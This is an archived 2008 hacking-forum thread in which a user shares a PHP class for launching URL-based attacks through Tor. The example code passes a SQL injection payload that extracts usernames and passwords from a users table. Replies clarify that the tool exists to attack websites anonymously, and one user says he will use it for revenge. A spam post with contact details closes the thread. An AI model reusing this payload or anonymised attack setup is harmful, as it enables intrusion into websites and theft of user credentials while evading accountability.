View Full Version : Interfacing Tor with PHP
ishkur88
June 29th, 2008, 02:01 AM
PHP5 Class to interface Tor with PHP
http://pastebin.com/f7cfefda5
Easy to use too..
<?php
include 'tor.0.1.php';
$test = new Tor;
$test->launch("http://site.com/pageid=", "null UNION users,news SELECT username,password FROM users WHERE id = 1");
$data = $this->getTorData();
var_dump($data);
?>
Epikhigh
June 29th, 2008, 10:37 AM
I'm not trying to sound stupid or anything, but what is the point of this?
ishkur88
June 29th, 2008, 12:16 PM
This is the hacking forum, and this is the Programming subforum. I have an application that I made, so im posting it. you have an issue with that?
Maybe you just dont know what it does...
It allows you to run url based attacks on websites with the protection of the Tor network (or any proxy you care to enter really, its just that Tor is the default). It also allows you to run these attacks from a remote server, further increasing anonymity.
I think the example i posted shows fairly well how to actually use it.
Curkz
July 2nd, 2008, 12:49 AM
Nice ishkur88 i will use this to get back at some of the pricks :)
ishkur88
July 3rd, 2008, 12:06 AM
Sure you will......
Jerry_yrreJ
July 3rd, 2008, 02:36 PM
please spam, send virus and other...
3476936098
Tommy_B.C.rich@hotmail.it
vBulletin® v3.8.4, Copyright ©2000-2009, Jelsoft Enterprises Ltd.